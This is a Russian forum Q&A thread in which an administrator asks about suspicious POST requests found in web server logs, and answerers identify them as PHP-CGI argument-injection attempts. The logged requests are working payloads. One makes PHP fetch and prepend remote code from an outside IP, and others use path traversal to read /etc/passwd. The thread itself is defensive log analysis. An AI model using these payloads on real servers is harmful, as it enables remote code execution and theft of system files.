Что делают эти запросы к серверу?

Всем привет.

Просматривал логи запросов к www серверу и обнаружил такие интересный POST запрос. Не подскажите ли, чего добивался автор?

"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://129.171.178.13/pmwiki/api.gif%20-n HTTP/1.1"



попутно,

"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1"



и

"POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D../../../../../../../../../../../../etc/passwd%00%20-n HTTP/1.1"



с этими двумя запросами суть понятна, но не понятно, что пытались эксплуатировать. Может кто-нибудь удовлетворить мое любопытство и, может быть, предостеречь? )


Спасибо.
  • Вопрос задан
  • 3832 просмотра
Решения вопроса 1
barmaley_exe
@barmaley_exe
Похоже на относительно недавнюю уязвимость (см. комментарии).
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
den1n
@den1n
Пытались получить содержимое файла паролей через PHP инструкции auto_prepend_file, allow_url_include.
Ответ написан
@egorinsk
Дыра была в PHP, если он используется в Cgi режиме, то при определенном стечении звезд эти данные передаются ему как параметры командной строки и вызывают выполнение кода.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы